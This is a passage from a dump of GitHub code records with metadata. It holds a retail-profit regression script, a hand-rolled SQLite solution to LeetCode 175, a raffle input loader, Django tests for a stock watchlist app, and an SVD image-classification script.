1)\nfeature_list = list(features.columns)\nfeatures = np.array(features)\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nModel Creation\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n#Create X and y\nX,y = cluster_df.iloc[:,:-1],cluster_df.iloc[:,-1]\n\n#Standardize the dataframe before clsutering\nX_scaled = StandardScaler().fit_transform(X)\n\n#Create training and testing groups, 80-20 split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state=123)\n\n#Create Randfom Forest regression model\nregressor = RandomForestRegressor(n_estimators = 100, random_state=0)\nregressor.fit(X,y)\n\n#Predict test values, and generate predictions for all rows\ny_pred = regressor.predict(X_test)\nall_predictions = regressor.predict(features)\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nModel Output\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n#Generate Feature Importance Visualization\nplot_feature_importance(regressor.feature_importances_,X_train.columns, 'RANDOM FOREST')\n\n#Print Mean Absolute Error\nprint('Mean Absolute Error: ' ,metrics.mean_absolute_error(y_test, y_pred))\n\n#Create field to hold predictions for all records instead of just the test set\nfinal_df['Predicted Profit'] = all_predictions\n#Create Fields for determining the actual error from all records\n#Take the absolute value of the difference to determine the actual error\nfinal_df['Difference'] = final_df['Predicted Profit'] - final_df['Profit']\nfinal_df['abs(Difference)'] = final_df['Difference'].abs()\n\n#Print the Mean and Standard Deviation of the entire population of results.\nprint(\"MEAN: \", final_df['abs(Difference)'].mean())\nprint(\"STD DEV: \", final_df['abs(Difference)'].std())\n\nfinal_df.to_excel(\"Online Retail Data with RF Predictions.xlsx\", index=False)\n\n", "repo_name": "clare44macharia/online_retail", "sub_path": "regression.py", "file_name": "regression.py", "file_ext": "py", "file_size_in_byte": 4359, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 21, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "seaborn.barplot", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 78, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 90, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_absolute_error", "line_number": 107, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 107, "usage_type": "name"}]} +{"seq_id": "9688324418", "text": "\"\"\"leetcode.com Task 175. Combine Two Tables.\n\nTable: Person\n\n+-------------+---------+\n| Column Name | Type |\n+-------------+---------+\n| personId | int |\n| lastName | varchar |\n| firstName | varchar |\n+-------------+---------+\npersonId is the primary key column for this table.\nThis table contains information about the ID of some persons and their first and last names.\n\nTable: Address\n\n+-------------+---------+\n| Column Name | Type |\n+-------------+---------+\n| addressId | int |\n| personId | int |\n| city | varchar |\n| state | varchar |\n+-------------+---------+\naddressId is the primary key column for this table.\nEach row of this table contains information about the city and\nstate of one person with ID = PersonId.\n\n\nWrite an SQL query to report the first name, last name,\ncity, and state of each person in the Person table. If the\naddress of a personId is not present in the Address table,\nreport null instead.\n\nReturn the result table in any order.\n\nThe query result format is in the following example.\n\nInput:\nPerson table:\n+----------+----------+-----------+\n| personId | lastName | firstName |\n+----------+----------+-----------+\n| 1 | Wang | Allen |\n| 2 | Alice | Bob |\n+----------+----------+-----------+\nAddress table:\n+-----------+----------+---------------+------------+\n| addressId | personId | city | state |\n+-----------+----------+---------------+------------+\n| 1 | 2 | New York City | New York |\n| 2 | 3 | Leetcode | California |\n+-----------+----------+---------------+------------+\nOutput:\n+-----------+----------+---------------+----------+\n| firstName | lastName | city | state |\n+-----------+----------+---------------+----------+\n| Allen | Wang | Null | Null |\n| Bob | Alice | New York City | New York |\n+-----------+----------+---------------+----------+\nExplanation:\nThere is no address in the address table for the personId = 1 so we return null in their city and state.\naddressId = 1 contains information about the address of personId = 2.\n\"\"\"\n\nimport sqlite3\nimport sqlite_querry_functions as sqf\n\n\n\"\"\"\nFILES STRUCTURE:\n\nSqlite_querry_functions package is located in Additional_functions folder\n(sqlite_querry_functions package);\n\nInput and output databases are located in Databases folder;\n\nText filies inputs and outputs are located in Text_files folder\n\nDatabases names are the same as in the tasks but\nwith the number of task in the end, such as Person_175, Address_175 etc.\n\"\"\"\n\n\"\"\"=================\n DEFINITION SECTION\n=================\"\"\"\n\n# please, check the existance of the following folder and files\nDB_dir = 'Databases/'\nDB_input_name = 'leetcode_input.db'\nDB_output_name = 'leetcode_output.db'\n\n\n\"\"\"Filling the input table.\"\"\"\n\n# t_names - the list of the table names\nt_names = ['Person_175', 'Address_175', 'Person_Address_175']\n\n\"\"\"================ Person ================\"\"\"\n\n# Person_175 columns' names and types\nperson_cnt = [['personId', 'INTEGER'],\n ['lastName', 'TEXT'],\n ['firstName', 'TEXT']]\n\n# a separate list of column names\nperson_cn = []\nfor cname in person_cnt:\n person_cn.append(cname[0])\n# end for cname in person_cnt:\n\n# Person_175 table content\n# personId, sirname, name\nperson_table = [[1, \"Wang\", \"Allen\"],\n [2, \"Alice\", \"Bob\"],\n [3, \"Bond\", \"James\"],\n [4, \"Shakespeare\", \"William\"]]\n\n\"\"\"================ Address ================\"\"\"\n\n# Address_175 columns' names and types\naddress_cnt = [['addressId', 'INTEGER'],\n ['personId', 'INTEGER'],\n ['city', 'TEXT'],\n ['state', 'TEXT']]\n\n# a separate list of column names\naddress_cn = []\nfor cname in address_cnt:\n address_cn.append(cname[0])\n# end for cname in person_cnt:\n\n# Address_175 table content\n# addressId, personId, city, state\naddress_table = [[1, 2, 'Melbourne', 'Victoria'],\n [2, 3, 'Sydney', 'NSW'],\n [3, 7, 'New York City', 'New York'],\n [4, 8, 'Leetcode', 'California'],\n [5, 4, 'London', 'Britain']]\n\ncc = 'personId' # common column by which tables are merging\n\n\"\"\"==============\n INPUT SECTION\n==============\"\"\"\n\ni_p = DB_dir+DB_input_name # input path\n\nwith sqlite3.connect(i_p) as con:\n cur = con.cursor()\n # t_names[0] = Person_175\n cur.execute(\"DROP TABLE IF EXISTS \" + t_names[0])\n\n SQL_st = sqf.SQL_CREATE_Table(t_names[0]) # row_id column created automatically\n cur.execute(SQL_st)\n\n \"\"\" Initiating creation of the structure of t_names[0] = Person_175\"\"\"\n for column_n_t in person_cnt: # [0] - column name; [1] - column type\n SQL_st = sqf.SQL_ADD_Column(t_names[0],\n column_n_t[0],\n column_n_t[1])\n cur.execute(SQL_st)\n # end for column_n_t in person_cnt:\n\n \"\"\" The structure of the table Person_175 is completed\"\"\"\n \"\"\" Initiating the filling of the table.\"\"\"\n\n for i in range(len(person_table)):\n SQL_st = sqf.SQL_INSERT_INTO(\n t_names[0],\n person_cn,\n person_table[i])\n a = sqf.SQL_CV_list(person_cn)\n b = sqf.SQL_CV_list(person_table[i])\n cur.execute(SQL_st)\n # end for i in range(len(person_table)):\n \"\"\" Person_175 is filled.\"\"\"\n\n # t_names[1] = Address_175\n cur.execute(\"DROP TABLE IF EXISTS \" + t_names[1])\n\n SQL_st = sqf.SQL_CREATE_Table(t_names[1]) # row_id column created automatically\n cur.execute(SQL_st)\n\n \"\"\" Initiating creation of the structure of Address_175.\"\"\"\n for address_n_t in address_cnt: # [0] - column name; [1] - column type\n SQL_st = sqf.SQL_ADD_Column(t_names[1],\n address_n_t[0],\n address_n_t[1])\n cur.execute(SQL_st)\n # end for address_n_t in address_cnt:\n\n \"\"\" The structure of the table Address_175 is completed\"\"\"\n \"\"\" Initiating the filling of the table.\"\"\"\n\n for i in range(len(address_table)):\n SQL_st = sqf.SQL_INSERT_INTO(\n t_names[1],\n address_cn,\n address_table[i])\n cur.execute(SQL_st)\n # end for i in range(len(person_table)):\n \"\"\" Address_175 is filled.\"\"\"\n\n\"\"\"===============\n OUTPUT SECTION\n===============\"\"\"\n\no_p = DB_dir+DB_output_name # output path\n\ninp = sqlite3.connect(i_p) # must be closed in the end\noutp = sqlite3.connect(o_p) # must be closed in the end\n\n\"\"\" creating table with the results ==============\"\"\"\n\ncuro = outp.cursor()\ncuro.execute(\"DROP TABLE IF EXISTS \" + t_names[2])\n\nSQL_st = sqf.SQL_CREATE_Table(t_names[2]) # row_id column created automatically\ncuro.execute(SQL_st)\n\npc_cnt = person_cnt # creating the list of column names and types\nfor val in address_cnt:\n if val not in pc_cnt:\n pc_cnt.append(val)\n # end if val not in pc_cnt\n# end for val in address_cnt\npc_cnt.remove(pc_cnt[0]) # has new indexation after removing an element\npc_cnt.remove(pc_cnt[2])\n\n\"\"\" Initiating creation of the structure of t_names[2] = Person_Address_175\"\"\"\nfor column_n_t in pc_cnt: # [0] - column name; [1] - column type\n SQL_st = sqf.SQL_ADD_Column(t_names[2],\n column_n_t[0],\n column_n_t[1])\n curo.execute(SQL_st)\n# end for column_n_t in person_cnt:\n\n# a separate list of column names\npc_cn = []\nfor cname in pc_cnt:\n pc_cn.append(cname[0])\n# end for cname in person_cnt:\n\"\"\" output table has been created ================\"\"\"\n\n\"\"\" merging columns with personId ==============\"\"\"\n\ncuri = inp.cursor()\n\n# receing the values in the rows with personId in each table\nt0_cc = []\nSQL_st = \"SELECT \" + cc + \" FROM \" + t_names[0]\nfor val in curi.execute(SQL_st).fetchall():\n t0_cc.append(val)\n# end for\n\nt1_cc = []\nSQL_st = \"SELECT \" + cc + \" FROM \" + t_names[1]\nfor val in curi.execute(SQL_st).fetchall():\n t1_cc.append(val)\n# end for\n\n\"\"\"\n1) check personId in the 1 table,\n2) take the values of the corresponding row from the 1 table\n3) check if the second table has the same personId value\n3.5) delete the value from the list for preventing a double usage\n4) take the values of the corresponding row from the 2 table\n5) add values from 4) to the list with values from 2)\n6) write the list into the table 3\n\"\"\"\nfor val in t0_cc:\n row_val = []\n SQL_st = \"SELECT * FROM \" + t_names[0] + \" WHERE \" + cc + \" = \" + str(val[0])\n cc_t0 = curi.execute(SQL_st).fetchone()\n # adding into the resulting row all values except for the first 2\n for i in range(len(cc_t0)-2):\n row_val.append(cc_t0[i+2])\n # end for\n\n if val in t1_cc:\n SQL_st = \"SELECT * FROM \" + t_names[1] + \" WHERE \" + cc + \" = \" + str(val[0])\n cc_t1 = curi.execute(SQL_st).fetchone()\n # adding into the resulting row all values except for the first 3\n for j in range(len(cc_t1)-3):\n row_val.append(cc_t1[j+3])\n # end for\n t1_cc.remove(val)\n # end if val in t1_cc:\n else:\n for i in range(len(address_cn)-2): # -2 (not -3) due to automatical column\n row_val.append('Null')\n # end for\n # end else\n # writing the row into the output table\n SQL_st = sqf.SQL_INSERT_INTO(\n t_names[2],\n pc_cn,\n row_val)\n curo.execute(SQL_st)\n # end for i in range(len(person_table)):\n\n\"\"\"\n1) check the remaining list of personalId -> t1_cc,\n2) for each value in the list take the corresponding row\n3) create the row for the new table with absent columns filled with None\n4) write the row into the table\n\"\"\"\n\nfor val in t1_cc: # only elemens different from t0_cc remains\n row_val = []\n for i in range(len(person_cn)-1): # -1 (not -2) due to automatical column\n row_val.append('Null')\n # end for\n SQL_st = \"SELECT * FROM \" + t_names[1] + \" WHERE \" + cc + \" = \" + str(val[0])\n cc_t1 = curi.execute(SQL_st).fetchone()\n # adding into the resulting row all values except for the first 3\n for j in range(len(cc_t1)-3):\n row_val.append(cc_t1[j+3])\n # end for\n # writing the row into the output table\n SQL_st = sqf.SQL_INSERT_INTO(\n t_names[2],\n pc_cn,\n row_val)\n curo.execute(SQL_st)\n\n\n\"\"\" columns with personId have been merged into cc_me list ==============\"\"\"\noutp.commit() # commiting changes into output DB, do not commit into input DB\noutp.close() # outp = sqlite3.connect(o_p)\ninp.close() # inp = sqlite3.connect(i_p)\n", "repo_name": "YuriiNev/Leetcode_tasks_python", "sub_path": "01_leetcode_175.py", "file_name": "01_leetcode_175.py", "file_ext": "py", "file_size_in_byte": 10558, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlite3.connect", "line_number": 149, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_CREATE_Table", "line_number": 154, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_ADD_Column", "line_number": 159, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_INSERT_INTO", "line_number": 169, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_CV_list", "line_number": 173, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_CV_list", "line_number": 174, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_CREATE_Table", "line_number": 182, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_ADD_Column", "line_number": 187, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_INSERT_INTO", "line_number": 197, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 211, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 212, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_CREATE_Table", "line_number": 219, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_ADD_Column", "line_number": 233, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_INSERT_INTO", "line_number": 296, "usage_type": "call"}, {"api_name": "sqlite_querry_functions.SQL_INSERT_INTO", "line_number": 322, "usage_type": "call"}]} +{"seq_id": "29670682757", "text": "from __future__ import unicode_literals, absolute_import\n\nimport csv\nimport os\nimport re\n\ntry:\n from df2gspread import gspread2df\nexcept:\n gspread2df = None\n\nis_local_file = re.compile('^(file://)?(\\/?.+)$')\n\n\ndef input_gload(uri, column='Username', wks_name=None):\n if not gspread2df:\n raise RuntimeError('df2gspread is not installed')\n df = gspread2df.download(uri, wks_name, col_names=True)\n pool = df[column]\n return pool.values\n\n\ndef input_load(uri, column='Username'):\n uri = os.path.expanduser(uri)\n protocol, uri = is_local_file.match(uri).groups()\n if not protocol:\n f = open(uri)\n pool = [r[column] for r in csv.DictReader(f)]\n else:\n raise RuntimeError\n return pool\n\n\ndef input_filter(pool, exclude):\n pool = set(pool or [])\n exclude = set(exclude or [])\n return pool - exclude\n", "repo_name": "calmrat/rafflepy", "sub_path": "rafflepy/raffle.py", "file_name": "raffle.py", "file_ext": "py", "file_size_in_byte": 859, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "df2gspread.gspread2df", "line_number": 10, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 12, "usage_type": "call"}, {"api_name": "df2gspread.gspread2df", "line_number": 16, "usage_type": "name"}, {"api_name": "df2gspread.gspread2df.download", "line_number": 18, "usage_type": "call"}, {"api_name": "df2gspread.gspread2df", "line_number": 18, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "csv.DictReader", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "12880399473", "text": "from django.http import HttpRequest\nfrom django.template.loader import render_to_string\nfrom django.test import TestCase\nfrom django.urls import resolve\nfrom django.utils.timezone import now\n\nfrom .forms import WatchlistForm\nfrom .models import Industry\nfrom .views import index\n\n\nclass IndustryModelTests(TestCase):\n def test_is_empty(self):\n \"\"\" test No.1: テーブルは0件です\"\"\"\n saved_industry = Industry.objects.all()\n self.assertEqual(saved_industry.count(), 0)\n\n def test_is_not_empty(self):\n \"\"\"test No.2: 1つ登録すれば保存されたレコード数は1\"\"\"\n industry = Industry()\n industry.pub_date = now()\n industry.save()\n saved_industries = Industry.objects.all()\n self.assertEqual(saved_industries.count(), 1)\n\n def test_saving_and_get_industry(self):\n \"\"\"test No.3: 入れる前のデータと入れたあとのデータは等しい\"\"\"\n first_industry = Industry()\n market_code, symbol, company_name = \"HOSE\", \"AAA\", \"アンファット・バイオプラスチック\"\n first_industry.market_code = market_code\n first_industry.symbol = symbol\n first_industry.company_name = company_name\n first_industry.pub_date = now()\n first_industry.save()\n saved_industries = Industry.objects.all()\n actual_industry = saved_industries[0]\n self.assertEqual(actual_industry.market_code, market_code)\n self.assertEqual(actual_industry.symbol, symbol)\n self.assertEqual(actual_industry.company_name, company_name)\n\n\nclass UrlResolveTests(TestCase):\n def test_url_resolves_to_book_list_view(self):\n \"\"\"test No.4: /では、indexが呼び出される事を検証\"\"\"\n found = resolve('/')\n self.assertEqual(found.func, index)\n\n\n# class HtmlTests(TestCase):\n# def test_book_list_page_returns_correct_html(self):\n# \"\"\"test No.5: /では、HTMLを検証\"\"\"\n# request = HttpRequest()\n# response = index(request)\n# expected_html = render_to_string('/')\n# self.assertEqual(response.content.decode(), expected_html)\n\n\nclass FormTests(TestCase):\n def test_valid(self):\n \"\"\"test No.6: 正常な入力を行えばエラーにならない\"\"\"\n params = dict(symbol='HOSE', bought_day=now(), stocks_price=1000, stocks_count=500)\n industry = Industry()\n form = WatchlistForm(params, instance=industry)\n self.assertTrue(form.is_valid())\n\n def test_either1(self):\n \"\"\"test No.7: 何も入力しなければエラーになることを検証\"\"\"\n params = dict()\n industry = Industry()\n form = WatchlistForm(params, instance=industry)\n self.assertFalse(form.is_valid())\n\n\nclass CanSaveAPostRequestAssert(TestCase):\n def assertFieldInResponse(self, response, name, page, publisher):\n self.assertIn(name, response.content.decode())\n self.assertIn(page, response.content.decode())\n self.assertIn(publisher, response.content.decode())\n\n\nclass CanSaveAPostRequestTests(CanSaveAPostRequestAssert):\n def post_request(self, name, page, publisher):\n request = HttpRequest()\n request.method = 'POST'\n request.POST['name'] = name\n request.POST['page'] = page\n request.POST['publisher'] = publisher\n return request\n\n # def test_book_edit_can_save_a_post_request(self):\n # name, page, publisher = 'name', 'page', 'publisher'\n # request = self.post_request(name, page, publisher)\n # response = index(request)\n # self.assertFieldInResponse(response, name, page, publisher)\n", "repo_name": "tdev1999/Portfolio", "sub_path": "mysite/vietnam_research/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 3650, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.test.TestCase", "line_number": 12, "usage_type": "name"}, {"api_name": "models.Industry.objects.all", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Industry.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.Industry", "line_number": 15, "usage_type": "name"}, {"api_name": "models.Industry", "line_number": 20, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Industry.objects.all", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Industry.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.Industry", "line_number": 23, "usage_type": "name"}, {"api_name": "models.Industry", "line_number": 28, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 33, "usage_type": "call"}, {"api_name": "models.Industry.objects.all", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Industry.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "models.Industry", "line_number": 35, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 42, "usage_type": "name"}, {"api_name": "django.urls.resolve", "line_number": 45, "usage_type": "call"}, {"api_name": "views.index", "line_number": 46, "usage_type": "argument"}, {"api_name": "django.test.TestCase", "line_number": 58, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 61, "usage_type": "call"}, {"api_name": "models.Industry", "line_number": 62, "usage_type": "call"}, {"api_name": "forms.WatchlistForm", "line_number": 63, "usage_type": "call"}, {"api_name": "models.Industry", "line_number": 69, "usage_type": "call"}, {"api_name": "forms.WatchlistForm", "line_number": 70, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 74, "usage_type": "name"}, {"api_name": "django.http.HttpRequest", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "213953499", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[154]:\n\n\n# Task 1\n# Add all the required libraries here, will be using dimensionality reduction technique of SVD\nimport torch\nimport numpy as np\nimport pandas as pd\nimport re\nimport warnings \nwarnings.filterwarnings('ignore')\n\n# In[155]:\n\n\n# Adding all the required functions here\n# parse_string function\ndef parse_string(string):\n values = re.findall(r'-?\\d+\\.\\d+', string)\n np_array = np.array(values, dtype=float)\n return torch.tensor(np_array, dtype=torch.float32)\n\n# this function is to perform SVD\ndef svd(k, feature_matrix):\n covariance_matrix_1 = np.dot(feature_matrix.T, feature_matrix)\n eigenvalues_1, eigenvectors_1 = np.linalg.eig(covariance_matrix_1)\n ncols1 = np.argsort(eigenvalues_1)[::-1]\n covariance_matrix_2 = np.dot(feature_matrix, feature_matrix.T)\n eigenvalues_2, eigenvectors_2 = np.linalg.eig(covariance_matrix_2)\n ncols2 = np.argsort(eigenvalues_2)[::-1]\n v_transpose = eigenvectors_1[ncols1].T\n u = eigenvectors_2[ncols2]\n sigma = np.diag(np.sqrt(eigenvalues_1)[::-1])\n trucated_u = u[:, :k]\n trucated_sigma = sigma[:k, :k]\n truncated_v_transpose = v_transpose[:k, :]\n image_to_latent_features = feature_matrix @ truncated_v_transpose.T\n latent_feature_to_original_feature = truncated_v_transpose\n # svd = TruncatedSVD(n_components=k)\n # reduced_data = svd.fit_transform(feature_matrix)\n # image_to_latent_features = feature_matrix @ v_transpose.T\n # latent_feature_to_original_feature = v_transpose\n return image_to_latent_features, latent_feature_to_original_feature\n\n# for each label, I am going to do label semantic analysis, one by one, the value of k=10\ndef perform_svd(k, data, labels):\n # first thing I need to do is convert everything to a numpy array so that I can pass to the SVD function\n reduced_features = {}\n for label in labels:\n label_data = data.get_group(label)[feature_model]\n # Convert the list of arrays to a 2D NumPy array\n list_data = np.vstack([np.array(image) for image in label_data])\n\n # Performing Singular Value Decomposition (SVD)\n image_to_latent_features, _ = svd(k, list_data)\n\n # Storing the reduced features in the dictionary\n reduced_features[label] = image_to_latent_features\n return reduced_features\n\ndef cosine_similarity(vector_a, vector_b):\n # Calculated the dot product of the two vectors\n dot_product = np.dot(vector_a, vector_b)\n\n # Calculated the Euclidean norm (magnitude) of each vector\n norm_a = np.linalg.norm(vector_a)\n norm_b = np.linalg.norm(vector_b)\n\n # Calculated the cosine similarity\n similarity = dot_product / (norm_a * norm_b)\n return similarity\n\ndef calculate_similarity(latent_semantics1, latent_semantics2):\n \"\"\"Calculate the cosine similarity between two latent semantics.\"\"\"\n return cosine_similarity(latent_semantics1, latent_semantics2)\n\ndef calculate_total_accuracy(predicted_labels):\n total_num = 0\n true_positives = 0\n for label in predicted_labels.keys():\n for image_label in predicted_labels[label]:\n total_num += 1\n if image_label == label:\n true_positives += 1\n return true_positives/total_num\n\n# function to calculate per-label precision, recall, and F1-score\ndef calculate_metrics(predicted_labels):\n num_labels = len(predicted_labels)\n label_metrics = {}\n for label in predicted_labels.keys():\n true_positives = 0\n false_positives = 0\n false_negatives = 0\n for image_label in predicted_labels[label]:\n if image_label == label:\n true_positives += 1\n else:\n false_positives += 1\n false_negatives = num_labels - true_positives # All instances not considered as true positives\n\n precision = true_positives / (true_positives + false_positives) if (true_positives + false_positives) > 0 else 0\n recall = true_positives / (true_positives + false_negatives) if (true_positives + false_negatives) > 0 else 0\n f1_score = 2 * (precision * recall) / (precision + recall) if (precision + recall) > 0 else 0\n label_metrics[label] = [precision, recall, f1_score]\n return label_metrics\n\ndef print_metrics(label_metrics, predicted_labels):\n for label in label_metrics:\n print(f\"Label {label}: Precision: {label_metrics[label][0]}, Recall: {label_metrics[label][1]}, f1 Score: {label_metrics[label][2]}.\")\n print(f\"Total accuracy: {calculate_total_accuracy(predicted_labels)}\")\n \ndef select_feature_model(option):\n if option == 1:\n return \"HOG\"\n elif option == 2:\n return \"ColorMoments\"\n elif option == 3:\n return \"ResNet_AvgPool_1024\"\n elif option == 4:\n return \"ResNet_Layer3_1024\"\n else:\n return \"ResNet_FC_1000\"\n \n\n\n# In[156]:\n\n\n# Step 1: Feature Extraction and Storage\n# reading the feature file and using the resnet fc model for extraction\ndf = pd.read_csv('../FD_Objects.csv')\n\nfeature_option = int(input(\"Please pick one of the below options\\n\"\n \"1. HOG\\n\"\n \"2. Color Moments\\n\"\n \"3. Resnet Layer 3\\n\"\n \"4. Resnet Avgpool\\n\"\n \"5. Resnet FC\\n\"\n \"--------------\\n\"))\nk = int(input(\"Please enter the value of k: \"))\n\nfeature_model = select_feature_model(feature_option)\ndf[feature_model] = df[feature_model].apply(parse_string)\n\n# Convert the column to a NumPy array\nnumpy_array = df[feature_model].to_numpy()\n\n# extracting the even and odd feature set \neven_data = df.iloc[::2]\nodd_data = df.iloc[1::2]\n\n# extracting labels\ngrouped_data_even = even_data.groupby('Labels')\nlabels = list(grouped_data_even.groups.keys())\n\n\n# In[157]:\n\n\n# Step 2: Latent Semantic Analysis (LSA)\n\n# getting reduced data for even images in the label\nreduced_feature_even = perform_svd(k, grouped_data_even, labels)\n\n# getting reduced data for odd images in the label\ngrouped_data_odd = odd_data.groupby('Labels')\nreduced_feature_odd = perform_svd(k, grouped_data_odd, labels)\n\n\n# In[158]:\n\n\n# now we need to compare the similarity measure of each of the odd data with the even data images\npredicted_label = {}\n\nfor label_odd in reduced_feature_odd.keys():\n predicted_label[label_odd] = []\n #comparing each odd image with even image\n for i in range(len(reduced_feature_odd[label_odd])):\n min_distance = np.zeros(5)\n label_min_distance = np.zeros(5)\n for label_even in reduced_feature_even.keys():\n for j in range(len(reduced_feature_even[label_even])):\n # now you can compare each odd image with each even image\n similarity = calculate_similarity(reduced_feature_odd[label_odd][i] , reduced_feature_even[label_even][j])\n #see if the similarity is greater than the values currently stored\n if similarity > np.max(min_distance):\n# print(\"coming here\", similarity, np.max(min_distance), min_distance)\n min_index = np.argmin(min_distance)\n min_distance[min_index] = similarity\n label_min_distance[min_index] = label_even\n \n \n# print(similarity)\n# print(label_odd, i,label_even, j, similarity)\n \n# break\n# max_index = np.where(min_distance == max(min_distance))\n most_frequent_value_np = np.bincount(label_min_distance.astype(int)).argmax()\n \n# print(i,most_frequent_value_np)\n predicted_label[label_odd].append(most_frequent_value_np)\n# break\n# break\n\n \n\n\n# In[159]:\n\n\nlabel_metrics = calculate_metrics(predicted_label)\nprint_metrics(label_metrics, predicted_label)\n\n", "repo_name": "rajat98/CSE-515-MWD-phase-3", "sub_path": "Code/Task1.py", "file_name": "Task1.py", "file_ext": "py", "file_size_in_byte": 7894, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "warnings.filterwarnings", "line_number": 14, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.linalg.eig", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 191, "usage_type": 